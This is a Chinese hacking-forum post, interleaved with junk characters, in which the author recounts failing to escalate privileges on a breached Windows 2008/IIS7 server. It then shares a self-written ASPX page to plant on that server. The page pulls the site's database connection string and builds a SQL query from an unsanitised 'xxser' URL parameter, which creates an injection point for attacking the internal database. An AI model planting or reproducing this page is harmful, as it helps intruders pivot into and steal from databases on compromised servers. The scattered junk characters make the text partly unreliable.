昨天跟4z1看一个站点,提权很难提,看了整整5个小时,无果。 2008+iis7,无sa,无root,无各种服务。。。9 m: s8 H* S7 {/ Q/ F
其实中用到了aspx构造注射来跨站,网上找了一堆代码,没一个能用的。4 _9 _5 d; ^. ]; Y
代码量不多,自己写个拉倒了。烦死了。7 o$ f6 h# R; n- b
8 ]7 V# o% G. I; x* ~$ p$ | w6 R! j* ^# W$ l
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
. E9 S9 s" _, q5 u$ t" r3 j3 V$ H<html xmlns="http://www.w3.org/1999/xhtml">
& F; c f9 K( k' {! g( T<head runat="server">
8 }5 g& k0 j0 e: L% T! g <title>暗影aspx构造注射专用页面</title>
5 C& I `7 N3 M; m</head>
" X+ K, S0 W. t& A' h$ {% ]<body>
5 `% E2 ?$ r* r <form id="form1" runat="server">
$ i+ o0 s& y0 n) L9 d( H4 b <div>
* K5 U8 H) U# m( { <script language="c#" runat="server">) Z/ B6 y* z$ }9 a6 }. F
7 l- x/ O, Y' _9 s6 }
void page_init(object sender, EventArgs e)
$ A/ d* G: S1 X- F* L! h {9 c6 Z- X) Y' u3 n3 m! I
+ b, T- @& }- j* @! G1 h1 }) ~0 } System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();
1 b; {' \, Q# V- y
" q1 F5 }/ q2 t! J0 v; i conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ToString();
+ y7 A2 o1 q) \3 c' G, L$ E v conn.Open();/ x' K% f% I8 @& U
/ O8 T! C% A% G8 g; i7 g0 Z
string i = this.Page.Request.Params["xxser"]; //这里是参数?xxser=1
0 A& T2 e O0 d, `( h2 f& q2 m
* v1 R- o: e# K System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn);' H$ ~$ }! B: J0 n' a
int x = command.ExecuteNonQuery();
8 B" P/ C" `4 z1 b- [: } Response.Write(i+"\n");. o5 P, O8 B) V6 U4 m/ T
Response.Write(x);" i g+ ]( J# [' f- C/ l
conn.Close();/ J0 L7 X7 ^" { s7 y
}- ]; V6 q+ c& u6 N( N' O b
" @. U5 m' w4 @+ _
</script>
4 B& W+ [- l7 S0 C) i% z; n! w </div>
) K- A1 I% ]3 L8 f( `+ ^( m. x, Q </form>
2 F2 B7 J/ F7 o `</body>( \) w; c% y" I9 ^& p' Q
</html>; r# Y7 P9 t" `0 a# Y4 U% w2 A
|
发表于 2013-3-20 21:32:01
收藏
支持
反对